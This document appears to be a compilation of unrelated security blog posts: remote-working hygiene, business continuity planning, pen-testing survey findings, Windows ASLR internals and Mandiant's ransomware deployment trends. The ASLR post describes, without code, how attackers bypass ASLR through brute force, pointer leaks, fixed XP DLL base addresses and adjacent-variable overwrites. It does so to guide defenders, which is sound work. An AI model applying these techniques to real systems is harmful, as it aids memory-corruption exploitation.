Figure 2. A screenshot of the popular KPOT info stealer, part of an underground advertisement to sell stolen credentials. (notice the malware collects VPN, RDP and Mail credentials)

Just like we are all fighting to flatten the COVID-19 curve by social isolation and washing our hands, we should aim to flatten the cyber-attack surface of our organizations by having proper cyber security hygiene by using multi-factor authentication, VPNs, and robust End-Point security software.

Remote working

Employees working from home will need clear guidance on acceptable security practices from an organizational perspective:

  • Remote working policy guidance: While many organizations may employ wider guidance on cybersecurity/privacy guidance within their organizations there will likely be employees unaware of the expectations for remote working. Equally, this may also apply to security expectations, therefore any such policy must be reviewed but also effectively communicated to a wider group of employees now working from outside the organization’s offices.
  • Asset classification: With a larger set of the workforce now working from home, previously inaccessible information assets will need to be available for remote use. Subsequently, enhanced security measures will be necessary to ensure that information is only made available to those with a clear need to know.
  • Strong authentication: With passwords ubiquitous, and two-factor authentication now commonplace, ensuring the appropriate level of authorization for key assets is in place will be critical.
  • Awareness: All of the processes, and technology deployed within an organization can be simply undone by a lack of awareness. Ensuring all employees are made aware of the potential risks of connecting remotely is critical. It is especially important to be aware of cloud services authorized for work purposes and extra vigilant for targeted phishing emails.
  • VPN access: The term untrusted network is rarely a consideration when working in the office, however with so many employees connecting from externally located environments there is the potential for certain networks to be untrusted. While many will not be venturing into public spaces to limit social contact, there is no assurance that the connection every employee is connecting from is secure. Therefore, leveraging a VPN will be imperative, and indeed organizations may want to enforce certain assets only being accessible via the VPN.

Secure Mobile Working

Here are some key considerations for those responsible for enabling secure remote working capability:

  • Protecting against accidental data loss. Data encryption is fundamental to good device security hygiene and essential for enabling secure mobile working. Ensure that you have situational awareness of the end user security controls and can quickly report on the status when the inevitable question comes down from the CISO.
  • Providing an equivalent level of threat prevention. While on the office network or VPN, end user devices enjoy a defense in depth capability. However, do they have that same protection when not on the VPN? Using anti-malware solutions which employ cloud-based behavior analysis and threat intelligence combined with cloud-based web security can help ensure an equivalent level of security both on and off the network.
  • Secure cloud collaboration. Many employees will need to leverage cloud-based services such as Microsoft Teams and WebEx to collaborate both internally and externally. Ensure you can apply your corporate DLP policies to those cloud-native applications and that your users are fully aware of the authorized collaboration tools at their disposal.
  • Secure cloud access. Attackers will leverage spear-phishing emails with Corona Virus themes and watering hole attacks from compromised web sites to target workers and prey on the situation. Reduce the attack surface by tightening web security policies and block access to risky cloud services.
  • Phishing incident response. You will not be able to prevent everything so having a balanced security capability with detection and response is important. Security Operations should review incident response procedures for phishing, deploy Cloud-based EDR for rapid identification of compromised remote end user devices, and ensure users know how to submit suspect emails to the SOC.

Conclusion

A wealth of good advice and information is freely available including the Security Awareness Work-from-Home Deployment Kit[1]  from the SANS Institute which provides “multiple assets that address everything from securing a home network to best practices when working remotely to identifying social engineering attacks.” While the need to enable access as quickly as possibly is understandable, there are those hoping to exploit this urgency for their own personal gain.

Additional Resources

We will continue to make resources available to further enable secure home working, as well as insights into the threat landscape from this blog.

Please register for the webinar detailing Adaptable Security for Flexible Working Environments here:  https://mcafee.zoom.us/webinar/register/WN_AeXoyA-tT_eUFZ2_NvhpSA

[1] https://www.sans.org/security-awareness-training/sans-security-awareness-work-home-deployment-kit

The post Staying Safe While Working Remotely appeared first on McAfee Blogs.

NIST Helps Build Accurate Measurement Infrastructure for 5G Communications

As fifth-generation (5G) devices and networks begin to roll out, the National Institute of Standards and Technology (NIST) is helping to build the crucial measurement infrastructure for emerging wireless systems by developing new measurement methods and analysis tools and by facilitating the sharing of 5G performance data. These resources can help industry optimize designs for many applications, including cellphones, the internet of things, virtual reality, smart manufacturing and autonomous vehicles. One new NIST resource is a 5G Spectrum Sharing Test Bed, an adaptable network that can

How to create a business continuity plan – with free template

As the 2019 novel coronavirus sweeps across the globe, organisations are turning to their BCPs (business continuity plans) for solutions to the disruption that the pandemic is causing.

These plans should include guidance on to cope if employees are unable to work from the office – whether that’s because of a pandemic or something more prosaic, like a gas leak or other safety hazard.

If you don’t already have a plan in place, it’s not too late to start. Let’s take a look at everything you need to know.

What is a business continuity plan?

A BCP consists of the processes and procedures an organisation needs in order to continue operating during a disaster and recover as quickly as possible. All of this information is put into a document, which is regularly tested, developed and improved on to make sure the organisation is prepared. The BCP is often considered the heart of a BCMS (business continuity management system).

Who should have a business continuity plan?

All organisations, no matter their size, should create a BCP.

Every organisation is at risk of a disruptive incident. Nearly half of UK businesses suffered a cyber attack or security breach last year alone.

Failure to plan could have disastrous consequences for your organisation, potentially resulting in your organisation being unable to recover.


Free BCP template

To help you with your BCP, we’ve created a free downloadable template.

It outlines the elements that should be included in a BCP, and makes it quick and easy to tailor the documentation to your organisation’s requirements.

Download the template now >>


What should a business continuity plan include?

  1. Purpose and scope

Details of the plan should be provided and any exclusions must be explained.

  1. Responsibilities

Persons with authority during and after an incident must be assigned roles.

  1. Plan invocation

Details of how and when the BCP will be invoked.

  1. Developing the BCP

Information in the plan must be understood by and accessible to everyone in the organisation.

  1. Communications

How, and under which circumstances, the organisation will communicate with employees and their relatives, key interested parties and emergency contacts.

  1. Stakeholders

Provide information relating to essential stakeholders, including their contact details.

  1. Document owner, approver and change history record

The business continuity manager is the owner of the BCP and is responsible for ensuring that the procedure is reviewed and tested regularly.

  1. Change management

The document must be published in a place that is available to all members of staff, especially those directly involved in the BCP, and in all appropriate formats (digital, hard copy, etc.).

Benefits of a business continuity plan

Creating a BCP will make it easier for your organisation to cope in a crisis and minimise the disruption for you and your customers. It also demonstrates to customers and investors that your business is prepared for anything, thereby gaining their confidence and giving you a competitive edge.

A BCP can also reduce or even avoid the risk of losing revenue if you are hit with a disruption. Returning to business as usual as quickly as possible minimises the time that your organisation is unable to operate and therefore unable to generate revenue.

Organisations that aren’t prepared often appear incompetent. This can damage their reputation and brand image, putting many people off associating with them, which could lead to a loss of customers.

Protect your business with our BCM bundle

The disruption of the coronavirus pandemic means that organisations are facing new challenges almost every day. You can make sure you’re prepared for whatever comes your way with our Coronavirus Business Continuity Management Bundle.

It contains:

Develop a BCP that’s tailored to the risks your organisation faces with these document templates.

Robert Clark’s must-have guide considers how pandemics affect organisations – including operating with a depleted workforce – and explains how best to prepare for and mitigate their effects.

This book provides essential advice on how to establish a disaster recovery plan, paying close attention to the threat of phishing, malware and the major causes of IT failure.

Sarah Cook’s guide helps you reap the rewards of remote working by learning how to effectively manage your team.

Change can affect everyone differently, and as Naomi Klein discusses in this book, businesses must be prepared when implementing organisational changes.

Find out more


A version of this blog was originally published on 16 November 2018.

The post How to create a business continuity plan – with free template appeared first on IT Governance UK Blog.

Common Security Concerns and How to Reduce Your Risk

English

Reasons for Penetration Testing

What common security risks/entry points are you most concerned about?

cs-2020-pen-testing-survey-image.jpg

One of the questions asked in our 2020 Pen Testing Survey was about what common security risks that respondents were most concerned about. While misconfiguration (77%) and phishing (72%) were the top concerns, every option had a high enough percentage to warrant further discussion. Read on to find out what makes misconfiguration, phishing, poor passwords, lost/stolen devices, and orphaned accounts so worrisome, and what can be done to safeguard your organization against them.

Misconfiguration

At 77%, misconfiguration was the most common concern—and for good reason. Misconfigurations, and particularly cloud misconfigurations, have been to blame for a number of large breaches over the years. Even when security policies are properly configured at the start, they can often be altered at any time by any employee. Luckily, there are clear steps to successfully keep misconfiguration mistakes to a minimum.

Limit access. Users that have full access to their networks can end up in an application they aren’t familiar with and accidentally changing something. A strong Identity Access Management (IAM) program, whether through Identity Governance or Privileged Access Management solutions, can enforce the principle of least privilege by only giving employees the privileges they need to complete their job functions.

Monitor and manage security configuration. Since misconfigurations are so frequently accidental, they can go undetected for months, and all too often a breach is what notifies security teams of a vulnerability. Configurations of servers and networks should be routinely checked to verify that they adhere to your organization’s security policy. While this can be a challenge, especially with cloud servers regularly spinning up new instances, there are tools that can automate this administration and ensure efficiency. Additionally, configuration policies should be continuously monitored to ensure unauthorized changes don’t go unnoticed. It can be difficult to do this manually, so security monitoring tools like SIEM solutions can help keep track of any modifications to your organization’s policy.

Phishing

Since phish regularly evade spam filters, it can be difficult to prevent users from being regularly exposed to this problem. Phishing is also becoming increasingly challenging to spot, with sophisticated tactics designed to entice users to open them without question. For example, spear phish look incredibly realistic, and are tailored for specific people or groups. 

Phishing simulations imitate malicious phishing campaigns, allowing organizations to monitor whether any are opened, clicked, or have credentials entered. These simulations can assist in uncovering which employees are vulnerable to phishing, and what type of phish they’re likely to open. From there, regular reeducation sessions for those who fail phishing simulations can help create more discerning users.

Poor Passwords

Passwords are limited, but are still regularly used within companies. Weak passwords and ineffective password management are a major threat to the security of an organization’s sensitive data. It is essential to have a strong password management solution and maintain password policies that enforce complexity and non-reuse rules. But this must be done in a way that leverages secure and flexible authentication methods. A variety of password reset authentication options, including mobile reset applications, telephone-based keypad resets, or voice biometrics increase user adoption rates, while maintaining a secure reset channel.

Lost or Stolen Devices

While it’s incredibly convenient to have employees able to work from anywhere using laptops, tablets, or other issued devices, it has made the potential for loss or theft exponentially increase. While it’s impossible to prevent this from happening altogether, it’s important to have a policy in place that encourages employees to report these events as soon as possible. Security monitoring solutions may also be able to detect a stolen device before it’s been reported. These solutions can be set up to trigger alerts for abnormal behavior like repeated logon attempts, sessions from unusual locations or during odd hours, as well as any other suspicious activity.

Additionally, some measures can be taken to ensure that there is no damage aside from the cost and inconvenience of a lost device. Where possible, devices should be password or biometrically protected, and have an option of wiping them remotely.

Orphaned Accounts

Orphaned accounts are accounts that are still active in the network, but are no longer being used, typically because the user no longer works at the organization. While all organizations can have orphaned accounts, certain businesses are more susceptible—those with high turnover, a contingent workforce, seasonal employees, or those that have been through an institutional change, like a merger or acquisition. Since orphaned accounts are no longer associated with a valid user, they are an ideal way for attackers to gain access into an organization because no one is actively looking into them. Orphaned accounts are similar to misconfigurations in that they are typically accidental and consequently often linger. Luckily, they can also be managed with a comprehensive Identity Governance & Administration  (IGA) program.

Orphaned accounts are a common identity management problem, so an IGA program would include policies on provisioning and deprovisioning accounts with the user lifecycle in mind. This would take into account the type of user when it is first created—full-time employee, temporary employee, vendor, or contractor—as well as the necessary measures needed upon departure, whether it be voluntary or termination. Because of the complexities of these policies, there are solutions designed to automate this process that will mitigate the ongoing risk of orphaned accounts.

Prioritizing Security Weaknesses With Penetration Testing

All of the above concerns are valid, and require some sort of action in order to mitigate the danger they pose. But solutions to these issues take time, money, and resources, so organizations must be strategic in how they choose to address them. Penetration testing, which involves simulating attacks, exploiting your own network to uncover security weaknesses, provides valuable, actionable intelligence that will help you make such decisions.

Pen testing not only discovers which entry points have been left unprotected in your network, it helps you intelligently manage these vulnerabilities by determining how much risk they each pose. Additionally, retesting helps determine if changes made are improving your defenses. By regularly evaluating your infrastructure in this way, you can begin to build the most successful layered security posture for your organization.

cs-pen-testing-survey-webinar-blog-700x350.jpg

Common Security Concerns
Cyber Risk Identity and Access Management Password Penetration testing Privileged Account Management SIEM
Big text: 
Blog
Resource type: 
Blogs
Want to learn more pen testing insights?

Read the full 2020 Pen Testing Survey Report to get a comprehensive picture of the effectiveness of ethical hacking strategies, and the resources required to deploy a successful pen testing program.

Six Facts about Address Space Layout Randomization on Windows

Overcoming address space layout randomization (ASLR) is a precondition of virtually all modern memory corruption vulnerabilities. Breaking ASLR is an area of active research and can get incredibly complicated. This blog post presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.

Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash the program, or worse, provide the attacker full control over the system. Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them.

Since these bugs are hard to find and just one can compromise a system, security professionals have designed failsafe mechanisms to thwart software exploitation and limit the damage should a memory corruption bug be exploited. A “silver bullet” would be a mechanism to make exploits so tricky and unreliable that buggy code can be left in place, giving developers the years they need to fix or rewrite code in memory-safe languages. Unfortunately, nothing is perfect, but address space layout randomization (ASLR) is one of the best mitigations available.

ASLR works by breaking assumptions that developers could otherwise make about where programs and libraries would lie in memory at runtime. A common example is the locations of gadgets used in return-oriented programming (ROP), which is often used to defeat the defense of data execution prevention (DEP). ASLR mixes up the address space of the vulnerable process—the main program, its dynamic libraries, the stack and heap, memory-mapped files, and so on—so that exploit payloads must be uniquely tailored to however the address space of the victim process is laid out at the time. Writing a worm that propagates by blindly sending a memory corruption exploit with hard-coded memory addresses to every machine it can find is bound to fail. So long as the target process has ASLR enabled, the exploit’s memory offsets will be different than what ASLR has selected. This crashes the vulnerable program rather than exploiting it.

Fact 1: ASLR was introduced in Windows Vista. Pre-Vista versions of Windows lacked ASLR; worse, they went to great lengths to maintain a consistent address space across all processes and machines.

Windows Vista and Windows Server 2008 were the first releases to feature support for ASLR for compatible executables and libraries. One might assume that prior versions simply didn’t randomize the address space, and instead simply loaded DLLs at whatever location was convenient at the time—perhaps a predictable one, but not necessarily the same between two processes or machines. Unfortunately, these old Windows versions instead went out of their way to achieve what we’ll call “Address Space Layout Consistency”. Table 1 shows the “preferred base address” of some core DLLs of Windows XP Service Pack 3.

DLL

Preferred Base Address

ntdll

0x7c900000

kernel32

0x7c800000

user32

0x7e410000

gdi32

0x77f10000

Table 1: Windows DLLs contain a preferred base address used whenever possible if ASLR is not in place

When creating a process, pre-Vista Windows loads each of the program’s needed DLLs at its preferred base address if possible. If an attacker finds a useful ROP gadget in ntdll at 0x7c90beef, for example, the attacker can assume that it will always be available at that address until a future service pack or security patch requires the DLLs to be reorganized. This means that attacks on pre-Vista Windows can chain together ROP gadgets from common DLLs to disable DEP, the lone memory corruption defense on those releases.

Why did Windows need to support preferred base addresses? The answer lies in performance and in trade-offs made in the design of Windows DLLs versus other designs like ELF shared libraries. Windows DLLs are not position independent. Especially on 32-bit machines, if Windows DLL code needs to reference a global variable, the runtime address of that variable gets hardcoded into the machine code. If the DLL gets loaded at a different address than was expected, relocation is performed to fix up such hardcoded references. If the DLL instead gets loaded as its preferred base address, no relocation is necessary, and the DLL’s code can be directly mapped into memory from the file system.

Directly mapping the DLL file into memory is a small performance benefit since it avoids reading any of the DLL’s pages into physical memory until they are needed. A better reason for preferred base addresses is to ensure that only one copy of a DLL needs to be in memory. Without them, if three programs run that share a common DLL, but each loads that DLL at a different address, there would be three DLL copies in memory, each relocated to a different base. That would counteract a main benefit of using shared libraries in the first place. Aside from its security benefits, ASLR accomplishes the same thing—ensuring that the address spaces of loaded DLLs won’t overlap and loading only a single copy of a DLL into memory—in a more elegant way. Because ASLR does a better job of avoiding overlap between address spaces than statically-assigned preferred load addresses ever could, manually assigning preferred base addresses provides no optimization on an ASLR-capable OS, and is not needed any longer in the development lifecycle.

Takeaway 1.1: Windows XP and Windows Server 2003 and earlier do not support ASLR.

Clearly, these versions have been out of support for years and should be long gone from production use. The more important observation relates to software developers who support both legacy and modern Windows versions. They may not realize that the exact same program can be more secure or less secure depending on what OS version is running. Developers who (still!) have a customer base of mixed ASLR and non-ASLR supporting Windows versions should respond to CVE reports accordingly. The exact same bug might appear non-exploitable on Windows 10 but be trivially exploitable on Windows XP. The same applies to Windows 10 versus Windows 8.1 or 7, as ASLR has become more capable with each version.

Takeaway 1.2: Audit legacy software code bases for misguided ideas about preferred load addresses. 

Legacy software may still be maintained with old tools such as Microsoft Visual C++ 6. These development tools contain outdated documentation about the role and importance of preferred load addresses. Since these old tools cannot mark images as ASLR-compatible, a “lazy” developer who doesn’t bother to change the default DLL address is actually better off since a conflict will force the image to be rebased to an unpredictable location!

Fact 2: Windows loads multiple instances of images at the same location across processes and even across users; only rebooting can guarantee a fresh random base address for all images.

ELF images, as used in the Linux implementation of ASLR, can use position-independent executables and position-independent code in shared libraries to supply a freshly randomized address space for the main program and all its libraries on each launch—sharing the same machine code between multiple processes even where it is loaded at different addresses. Windows ASLR does not work this way. Instead, each DLL or EXE image gets assigned a random load address by the kernel the first time it is used, and as additional instances of the DLL or EXE are loaded, they receive the same load address. If all instances of an image are unloaded and that image is subsequently loaded again, the image may or may not receive the same base address; see Fact 4. Only rebooting can guarantee fresh base addresses for all images systemwide.

Since Windows DLLs do not use position-independent code, the only way their code can be shared between processes is to always be loaded at the same address. To accomplish this, the kernel picks an address (0x78000000 for example on 32-bit system) and begins loading DLLs at randomized addresses just below it. If a process loads a DLL that was used recently, the system may just re-use the previously chosen address and therefore re-use the previous copy of that DLL in memory. The implementation solves the issues of providing each DLL a random address and ensuring DLLs don’t overlap at the same time.

For EXEs, there is no concern about two EXEs overlapping since they would never be loaded into the same process. There would be nothing wrong with loading the first instance of an EXE at 0x400000 and the second instance at 0x500000, even if the image is larger than 0x100000 bytes. Windows just chooses to share code among multiple instances of a given EXE.

Takeaway 2.1: Any Windows program that automatically restarts after crashing is especially susceptible to brute force attacks to overcome ASLR. 

Consider a program that a remote attacker can execute on demand, such as a CGI program, or a connection handler that executes only when needed by a super-server (as in inetd, for example). A Windows service paired with a watchdog that restarts the service when it crashes is another possibility. An attacker can use knowledge of how Windows ASLR works to exhaust the possible base addresses where the EXE could be loaded. If the program crashes and (1) another copy of the program remains in memory, or (2) the program restarts quickly and, as is sometimes possible, receives the same ASLR base address, the attacker can assume that the new instance will still be loaded at the same address, and the attacker will eventually try that same address.

Takeaway 2.2: If an attacker can discover where a DLL is loaded in any process, the attacker knows where it is loaded in all processes. 

Consider a system running two buggy network services—one that leaks pointer values in a debug message but has no buffer overflows, and one that has a buffer overflow but does not leak pointers. If the leaky program reveals the base address of kernel32.dll and the attacker knows some useful ROP gadgets in that DLL, then the same memory offsets can be used to attack the program containing the overflow. Thus, seemingly unrelated vulnerable programs can be chained together to first overcome ASLR and then launch an exploit.

Takeaway 2.3: A low-privileged account can be used to overcome ASLR as the first step of a privilege escalation exploit. 

Suppose a background service exposes a named pipe only accessible to local users and has a buffer overflow. To determine the base address of the main program and DLLs for that process, an attacker can simply launch another copy in a debugger. The offsets determined from the debugger can then be used to develop a payload to exploit the high-privileged process. This occurs because Windows does not attempt to isolate users from each other when it comes to protecting random base addresses of EXEs and DLLs.

Fact 3: Recompiling a 32-bit program to a 64-bit one makes ASLR more effective.

Even though 64-bit releases of Windows have been mainstream for a decade or more, 32-bit user space applications remain common. Some programs have a true need to maintain compatibility with third-party plugins, as in the case of web browsers. Other times, development teams have a belief that a program needs far less than 4 GB of memory and 32-bit code could therefore be more space efficient. Even Visual Studio remained a 32-bit application for some time after it supported building 64-bit applications.

In fact, switching from 32-bit to 64-bit code produces a small but observable security benefit. The reason is that the ability to randomize 32-bit addresses is limited. To understand why, observe how a 32-bit x86 memory address is broken down in Figure 1. More details are explained at Physical Address Extension.


Figure 1: Memory addresses are divided into components, only some of which can be easily randomized at runtime

The operating system cannot simply randomize arbitrary bits of the address. Randomizing the offset within a page portion (bits 0 through 11) would break assumptions the program makes about data alignment. The page directory pointer (bits 30 and 31) cannot change because bit 31 is reserved for the kernel, and bit 30 is used by Physical Address Extension as a bank switching technique to address more than 2GB of RAM. This leaves 14 bits of the 32-bit address off-limits for randomization.

In fact, Windows only attempts to randomize 8 bits of a 32-bit address. Those are bits 16 through 23, affecting only the page directory entry and page table entry portion of the address. As a result, in a brute force situation, an attacker can potentially guess the base address of an EXE in 256 guesses.

When applying ASLR to a 64-bit binary, Windows is able to randomize 17-19 bits of the address (depending on whether it is a DLL or EXE). Figure 2 shows how the number of possible base addresses, and accordingly the number of brute force guesses needed, increases dramatically for 64-bit code. This could allow endpoint protection software or a system administrator to detect an attack before it succeeds.


Figure 2: Recompiling 32-bit code as 64-bit dramatically increases the number of possible base addresses for selection by ASLR

Takeaway 3.1: Software that must process untrusted data should always be compiled as 64-bit, even if it does not need to use a lot of memory, to take maximum advantage of ASLR.

In a brute force attack, ASLR makes attacking a 64-bit program at least 512 times harder than attacking the 32-bit version of the exact same program.

Takeaway 3.2: Even 64-bit ASLR is susceptible to brute force attacks, and defenders must focus on detecting brute force attacks or avoiding situations where they are feasible.

Suppose an attacker can make ten brute force attempts per second against a vulnerable system. In the common case of the target process remaining at the same address because multiple instances are running, the attacker would discover the base address of a 32-bit program in less than one minute, and of a 64-bit program in a few hours. A 64-bit brute force attack would produce much more noise, but the administrator or security software would need to notice and act on it. In addition to using 64-bit software to make ASLR more effective, systems should avoid re-spawning a crashing process (to avoid giving the attacker a “second bite at the apple” to discover the base address) or force a reboot and therefore guaranteed fresh address space after a process crashes more than a handful of times.

Takeaway 3.3: Researchers developing a proof of concept attack against a program available in both 32-bit and 64-bit versions should focus on the 32-bit one first.

As long as 32-bit software remains relevant, a proof-of-concept attack against the 32-bit variant of a program is likely easier and quicker to develop. The resulting attack could be more feasible and convincing, leading the vendor to patch the program sooner.

Fact 4: Windows 10 reuses randomized base addresses more aggressively than Windows 7, and this could make it weaker in some situations.

Observe that even if a Windows system must ensure that multiple instances of one DLL or EXE all get loaded at the same base address, the system need not keep track of the base address once the last instance of the DLL or EXE is unloaded. If the DLL or EXE is loaded again, it can get a fresh base address.

This is the behavior we observed in working with Windows 7. Windows 10 can work differently. Even after the last instance of a DLL or EXE unloads, it may maintain the same base address at least for a short period of time—more so for EXEs than DLLs. This can be observed when repeatedly launching a command-line utility under a multi-process debugger. However, if the utility is copied to a new filename and then launched, it receives a fresh base address. Likewise, if a sufficient duration has passed, the utility will load at a different base address. Rebooting, of course, generates fresh base addresses for all DLLs and EXEs.

Takeaway 4.1: Make no assumptions about Windows ASLR guarantees beyond per-boot randomization.

In particular, do not rely on the behavior of Windows 7 in randomizing a fresh address space whenever the first instance of a given EXE or DLL loads. Do not assume that Windows inherently protects against brute force attacks against ASLR in any way, especially for 32-bit processes where brute force attacks can take 256 or fewer guesses.

Fact 5: Windows 10 is more aggressive at applying ASLR, and even to EXEs and DLLs not marked as ASLR-compatible, and this could make ASLR stronger.

Windows Vista and 7 were the first two releases to support ASLR, and therefore made some trade-offs in favor of compatibility. Specifically, these older implementations would not apply ASLR to an image not marked as ASLR-compatible and would not allow ASLR to push addresses above the 4 GB boundary. If an image did not opt in to ASLR, these Windows versions would continue to use the preferred base address.

It is possible to further harden Windows 7 using Microsoft’s Enhanced Mitigation Experience Toolkit (commonly known as EMET) to more aggressively apply ASLR even to images not marked as ASLR-compatible. Windows 8 introduced more features to apply ASLR to non-ASLR-compatible images, to better randomize heap allocations, and to increase the number of bits of entropy for 64-bit images.

Takeaway 5.1: Ensure software projects are using the correct linker flags to opt in to the most aggressive implementation of ASLR, and that they are not using any linker flags that weaken ASLR.

See Table 2. Linker flags can affect how ASLR is applied to an image. Note that for Visual Studio 2012 and later, the ✔️flags are already enabled by default and the best ASLR implementation will be used so long as no 🚫flags are used. Developers using Visual Studio 2010 or earlier, presumably for compatibility reasons, need to check which flags the linker supports and which it enables by default.

Secure?

Linker Flag

Effect

✔️

/DYNAMICBASE

Marks the image as ASLR-compatible

✔️

/LARGEADDRESSAWARE /HIGHENTROPYVA

Marks the 64-bit image as free of pointer truncation bugs and therefore allows ASLR to randomize addresses beyond 4 GB

🚫

/DYNAMICBASE:NO

“Politely requests” that ASLR not be applied by not marking the image as ASLR-compatible. Depending on the Windows version and hardening settings, Windows might apply ASLR anyway.

🚫

/HIGHENTROPYVA:NO

Opts out 64-bit images from ASLR randomizing addresses beyond 4 GB on Windows 8 and later (to avoid compatibility issues).

🚫

/FIXED

Removes information from the image that Windows needs in order to apply ASLR, blocking ASLR from ever being applied.

Table 2: Linker flags can affect how ASLR is applied to an image

Takeaway 5.2: Enable mandatory ASLR and bottom-up randomization.

Windows 8 and 10 contain optional features to forcibly enable ASLR on images not marked as ASLR compatible, and to randomize virtual memory allocations so that rebased images obtain a random base address. This is useful in the case where an EXE is ASLR compatible, but one of the DLLs it uses is not. Defenders should enable these features to apply ASLR more broadly, and importantly, to help discover any remaining non-ASLR-compatible software so it can be upgraded or replaced.

Fact 6: ASLR relocates entire executable images as a unit.

ASLR relocates executable images by picking a random offset and applying it to all addresses within an image that would otherwise be relative to its base address. That is to say:

  • If two functions in an EXE are at addresses 0x401000 and 0x401100, they will remain 0x100 bytes apart even after the image is relocated. Clearly this is important due to the prevalence of relative call and jmp instructions in x86 code. Similarly, the function at 0x401000 will remain 0x1000 bytes from the base address of the image, wherever it may be.
  • Likewise, if two static or global variables are adjacent in the image, they will remain adjacent after ASLR is applied.
  • Conversely, stack and heap variables and memory-mapped files are not part of the image and can be randomized at will without regard to what base address was picked.

Takeaway 6.1: A leak of just one pointer within an executable image can expose the randomized addresses of the entire image.

One of the biggest limitations and annoyances of ASLR is that seemingly innocuous features such as a debug log message or stack trace that leak a pointer in the image become security bugs.  If the attacker has a copy of the same program or DLL and can trigger it to produce the same leak, they can calculate the difference between the ASLR and pre-ASLR pointer to determine the ASLR offset. Then, the attacker can apply that offset to every pointer in their attack payload in order to overcome ASLR. Defenders should train software developers about pointer disclosure vulnerabilities so that they realize the gravity of this issue, and also regularly assess software for these vulnerabilities as part of the software development lifecycle.

Takeaway 6.2: Some types of memory corruption vulnerabilities simply lie outside the bounds of what ASLR can protect.

Not all memory corruption vulnerabilities need to directly achieve remote code execution. Consider a program that contains a buffer variable to receive untrusted data from the network, and a flag variable that lies immediately after it in memory. The flag variable contains bits specifying whether a user is logged in and whether the user is an administrator. If the program writes data beyond the end of the receive buffer, the “flags” variable gets overwritten and an attacker could set both the logged-in and is-admin flags. Because the attacker does not need to know or write any memory addresses, ASLR does not thwart the attack. Only if another hardening technique (such as compiler hardening flags) reordered variables, or better, moved the location of every variable in the program independently, would such attacks be blocked.

Conclusion

Address space layout randomization is a core defense against memory corruption exploits. This post covers some history of ASLR as implemented on Windows, and also explores some capabilities and limitations of the Windows implementation. In reviewing this post, defenders gain insight on how to build a program to best take advantage of ASLR and other features available in Windows to more aggressively apply it. Attackers can leverage ASLR limitations, such as address space randomization applying only per boot and randomization relocating the entire image as one unit, to overcome ASLR using brute force and pointer leak attacks.

5 ways to tick off a CISO

YL Ventures Managing Partner Yoav Leitersdorf sat down with cybersecurity powerhouses Pete Bodine, Managing Director at AllegisCyber Capital, Mickey Boodaei, CEO & Founder at Transmit Security, Dino Boukouris, Founding Director at Momentum Cyber, Dawn-Marie Hutchinson, CISO at GSK, Jay Leek, Managing Director at ClearSky, Richard Rushing, CISO at Motorola Mobility, and Oren Yunger, VP at GGV Capital to discuss why security vendors keep CISOs up at night. However, a lot of the answers now seem to lie in mending the risks and occasional damage rendered by existing vendors and products.

“The term ‘minimal viable product’ does not work well in security,” counsels Motorola Mobility CISO and YL Ventures Advisor Richard Rushing. This warning was one of many stark revelations expressed in my latest sit-down with leading cybersecurity executives and industry experts. Convened to discover where CISOs would like to see enterprise software go next, the conversation took a decided turn on where it is currently and where existing solutions still leave them wanting.

To read this article in full, please click here

They Come in the Night: Ransomware Deployment Trends

Ransomware is a remote, digital shakedown. It is disruptive and expensive, and it affects all kinds of organizations, from cutting edge space technology firms, to the wool industry, to industrial environments. Infections have forced hospitals to turn away patients and law enforcement to drop cases against drug dealers. Ransomware operators have recently begun combining encryption with the threat of data leak and exposure in order to increase leverage against victims. There may be a silver lining, however; Mandiant Intelligence research suggests that focusing defensive efforts in key areas and acting quickly may allow organizations to stop ransomware before it is deployed.

Mandiant Intelligence examined dozens of ransomware incident response investigations from 2017 to 2019. Through this research, we identified a number of common characteristics in initial intrusion vectors, dwell time, and time of day of ransomware deployment. We also noted threat actor innovations in tactics to maximize profits (Figure 1). Incidents affected organizations across North America, Europe, Asia Pacific, and the Middle East in nearly every sector category, including financial services, chemicals and materials, legal and professional services, local government, and healthcare. We observed intrusions attributed to financially motivated groups such as FIN6, TEMP.MixMaster, and dozens of additional activity sets.


Figure 1: Themes Observed in Ransomware Incidents

These incidents provide us with enhanced insight into ransomware trends that can be useful for network defenders, but it is worth bearing in mind that this data represents only a sample of all activity. For example, Mandiant ransomware investigations increased 860% from 2017 to 2019. The majority of these incidents appeared to be post-compromise infections, and we believe that threat actors are accelerating use of tactics including post compromise deployment to increase the likelihood of ransom payment. We also observed incidents in which ransomware was executed immediately, for example GANDCRAB and GLOBEIMPOSTER incidents, but most of the intrusions examined were longer duration and more complex post-compromise deployments.

Common Initial Infection Vectors

We noted several initial infection vectors across multiple ransomware incidents, including RDP, phishing with a malicious link or attachment, and drive by download of malware facilitating follow-on activity. RDP was more frequently observed in 2017 and declined in 2018 and 2019. These vectors demonstrate that ransomware can enter victim environments by a variety of means, not all of which require user interaction.

RDP or other remote access

One of the most frequently observed vectors was an attacker logging on to a system in a victim environment via Remote Desktop Protocol (RDP). In some cases, the attacker brute forced the credentials (many failed authentication attempts followed by a successful one). In other cases, a successful RDP log on was the first evidence of malicious activity prior to a ransomware infection. It is possible that the targeted system used default or weak credentials, the attackers acquired valid credentials via other unobserved malicious activity, or the attackers purchased RDP access established by another threat actor. In April 2019, we noted that FIN6 used stolen credentials and RDP to move laterally in cases resulting in ransomware deployment.

Phishing with link or attachment

A significant number of ransomware cases were linked to phishing campaigns delivering some of the most prolific malware families in financially motivated operations: TRICKBOT, EMOTET, and FLAWEDAMMYY. In January 2019, we described TEMP.MixMaster TrickBot infections that resulted in interactive deployment of Ryuk.

Drive-by-download

Several ransomware infections were traced back to a user in the victim environment navigating to a compromised website that resulted in a DRIDEX infection. In October 2019, we documented compromised web infrastructure delivering FAKEUPDATES, then DRIDEX, and ultimately BITPAYMER or DOPPELPAYMER infections.

Most Ransomware Deployments Take Place Three or More Days After Initial Infection

The number of days elapsed between the first evidence of malicious activity and the deployment of ransomware ranged from zero to 299 days (Figure 2). That is, dwell times range quite widely, and in most cases, there was a time gap between first access and ransomware deployment. For 75 percent of incidents, at least three days passed between the first evidence of malicious activity and ransomware deployment.

